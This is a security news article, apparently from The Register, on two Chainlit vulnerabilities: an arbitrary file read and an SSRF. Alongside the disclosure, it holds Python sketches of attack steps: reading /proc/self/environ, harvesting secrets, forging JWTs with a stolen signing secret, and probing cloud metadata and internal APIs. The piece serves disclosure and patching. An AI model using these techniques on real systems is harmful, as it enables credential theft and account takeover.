AI framework flaws put enterprise clouds at risk of takeover

Two “easy-to-exploit” vulnerabilities in the popular open-source AI framework Chainlit put major enterprises’ cloud environments at risk of leaking data or even full takeover, according to cyber-threat exposure startup Zafran.

Chainlit is a Python package that organizations can use to build production-ready AI chatbots and applications. Corporations can either use Chainlit’s built-in UI and backend, or create their own frontend on top of Chainlit’s backend. It also integrates with other tools and platforms including LangChain, OpenAI, Bedrock, and LlamaIndex, and supports authentication and cloud deployment options.

The framework is downloaded about 700,000 times every month, and saw 5 million downloads last year.

The two vulnerabilities are CVE-2026-22218, which allows arbitrary file read, and CVE-2026-22219, which can lead to server-side request forgery (SSRF) attacks on the servers hosting AI applications.

While Zafran didn’t see any indications of in-the-wild exploitation, “the internet-facing applications we observed belonged to the financial services and energy sectors, and universities are also using this framework,” CTO Ben Seri told The Register.

Zafran disclosed the bugs to the project’s maintainers in November, and a month later, Chainlit released a patched version (2.9.4) that fixes the flaws. So if you use Chainlit, make sure to update the framework to the fixed release. 
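For a quick sanity check, a minimal sketch like this (assuming a plain numeric version string, which Chainlit releases use) will flag an install that predates the patch:

```python
# Check whether the installed Chainlit includes the fix shipped in 2.9.4.
# Assumes a plain numeric version string (no pre-release suffixes).
from importlib.metadata import PackageNotFoundError, version

FIXED = (2, 9, 4)

try:
    installed = version("chainlit")
except PackageNotFoundError:
    print("chainlit is not installed")
else:
    if tuple(int(p) for p in installed.split(".")[:3]) < FIXED:
        print(f"chainlit {installed} predates 2.9.4 - upgrade")
    else:
        print(f"chainlit {installed} includes the fix")
```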

Arbitrary file read

The arbitrary file read flaw, CVE-2026-22218, stems from how the framework handles elements – pieces of content, such as a file or image, that can be attached to a message. It can be triggered by sending a malicious element-update request carrying a tampered custom element, and abused to exfiltrate environment variables by reading /proc/self/environ.
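Zafran hasn't published a full proof of concept, so the endpoint and field names in the sketch below are assumptions for illustration only. The essence of the technique, per the firm's analysis, is an otherwise legitimate-looking element update whose file reference has been swapped for a path on the server's filesystem:

```python
# Illustrative only: the URL path and payload fields here are hypothetical;
# Chainlit's real element-update message differs. The core idea, per Zafran,
# is a custom element whose file reference points at an arbitrary server path.
import requests

TARGET = "https://chatbot.example.com"  # hypothetical Chainlit deployment

payload = {
    "id": "some-element-id",       # identifier of an existing element
    "type": "custom",
    "path": "/proc/self/environ",  # tampered: server-side file to read back
}
resp = requests.post(f"{TARGET}/api/element/update", json=payload, timeout=10)
print(resp.status_code, resp.text[:200])
```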

“These variables often contain highly sensitive values that the system and enterprise depend on, including API keys, credentials, internal file paths, internal IPs, and ports,” according to Zafran’s analysis, shared with The Register ahead of publication. “This is mostly dangerous in AI systems where the servers have access to internal data of the company to provide a tailored chatbot experience to their users.” 
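The environ file itself is just a NUL-delimited list of KEY=VALUE pairs, so a leaked copy is trivial to sift for secrets. A minimal parser:

```python
# /proc/self/environ is a NUL-delimited list of KEY=VALUE pairs.
raw = open("environ_dump", "rb").read()  # a leaked copy of /proc/self/environ

env = dict(
    entry.split("=", 1)
    for entry in raw.decode("utf-8", errors="replace").split("\x00")
    if "=" in entry
)

# Sift for the kinds of values Zafran highlights: API keys and credentials.
hits = {k: v for k, v in env.items()
        if any(tag in k.upper() for tag in ("KEY", "SECRET", "TOKEN", "PASSWORD"))}
for name, value in hits.items():
    print(f"{name} = {value[:8]}...")
```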

In environments where authentication is enabled, attackers can steal secrets used to sign authentication tokens (CHAINLIT_AUTH_SECRET). These secrets, when combined with user identifiers – leaked from databases or inferred from organization emails – can be abused to forge authentication tokens and fully take over users’ Chainlit accounts.
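To see why a leaked signing secret is so damaging, here's a sketch of token forgery assuming the deployment signs HS256 JSON Web Tokens with CHAINLIT_AUTH_SECRET; the claim names are illustrative, and a real attack would mirror whatever claims the target actually issues:

```python
# Illustrative token forgery with a stolen CHAINLIT_AUTH_SECRET, assuming
# HS256-signed JWTs. The claim names below are assumptions.
import datetime
import jwt  # PyJWT

stolen_secret = "value-of-CHAINLIT_AUTH_SECRET"  # leaked via the file read
victim = "alice@victim-corp.example"             # inferred from the org's email format

claims = {
    "identifier": victim,  # hypothetical claim name
    "exp": datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1),
}
forged = jwt.encode(claims, stolen_secret, algorithm="HS256")
print(forged)  # presented to the app as a valid session token
```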

Other environment variables up for grabs may include cloud credentials – such as AWS_SECRET_KEY – that Chainlit requires for cloud storage, along with sensitive API keys or the addresses and names of internal services.

Plus, an attacker can probe these addresses using the second SSRF vulnerability to access sensitive data from internal REST APIs. 
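Again with hypothetical endpoint and field names, the probing step might look like this; the 169.254.169.254 metadata service is a classic cloud SSRF target, and other candidates come straight from the leaked environment:

```python
# Illustrative SSRF probing: the endpoint and "url" field are hypothetical.
import requests

TARGET = "https://chatbot.example.com"  # hypothetical Chainlit deployment
candidates = [
    "http://169.254.169.254/latest/meta-data/",   # AWS instance metadata
    "http://internal-api.corp.local:8080/users",  # host leaked from environ
]

for url in candidates:
    payload = {"id": "some-element-id", "type": "custom", "url": url}
    r = requests.post(f"{TARGET}/api/element/update", json=payload, timeout=10)
    print(url, "->", r.status_code)
```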

Server-side request forgery

Zafran found the SSRF vulnerability, CVE-2026-22219, in the SQLAlchemy data layer. It is triggered the same way as the arbitrary file read – via a tampered custom element. The attacker can then retrieve the copied file by extracting the element’s “chainlit key” property from the metadata, download it to an attacker-controlled machine, and query it to access conversation history.

According to Seri, the vulnerabilities are “easy to exploit,” and can be combined in multiple ways to leak sensitive data, escalate privileges, and move laterally within the system.

“An attacker only needs to send a simple command and change one value to point to the file or URL they want to access,” he said. 

“Regarding how the vulnerabilities can be combined, SSRF typically requires knowledge of the server environment,” Seri added. “By leveraging the read-file vulnerability to leak that information, such as environment details or internal addresses, it becomes much easier to successfully carry out the SSRF attack.”
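Put together, the chain Seri describes looks roughly like this; both helper functions are hypothetical stand-ins for the two CVEs, returning canned data so the flow is clear:

```python
# Hypothetical chaining of the two bugs: read_file() stands in for the
# arbitrary file read (CVE-2026-22218) and ssrf_fetch() for the SSRF
# (CVE-2026-22219). Neither is a real API; both return canned data.

def read_file(path: str) -> bytes:
    """Stand-in for CVE-2026-22218 (arbitrary file read)."""
    return b"INTERNAL_API_URL=http://internal-api.corp.local:8080\x00AWS_SECRET_KEY=...\x00"

def ssrf_fetch(url: str) -> bytes:
    """Stand-in for CVE-2026-22219 (server-side request forgery)."""
    return b'{"records": "..."}'

# Step 1: leak the environment to learn internal hosts and credentials.
environ = read_file("/proc/self/environ").decode(errors="replace")
internal_host = next(
    entry.split("=", 1)[1]
    for entry in environ.split("\x00")
    if entry.startswith("INTERNAL_API_URL=")  # hypothetical variable name
)

# Step 2: aim the SSRF at an internal REST API discovered in step 1.
print(ssrf_fetch(f"{internal_host}/v1/records"))
```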

Companies increasingly use AI frameworks to build their own AI chatbots and apps, and Seri acknowledges that organizations are “working under very tight timelines to deliver fully functioning AI systems that integrate with highly sensitive data.”

Using third-party frameworks and open-source code allows development teams to move fast – but it also introduces new risks to the environment.

“The risk is not the use of third-party code by itself, but the combination of rapid integration, limited understanding of the added code, and reliance on external maintainers for security and code quality,” Seri said. “As a result, organizations end up deploying backend servers that communicate with clients, cloud resources, and LLMs, creating multiple entry points where vulnerabilities can emerge and put the system at risk.” ®
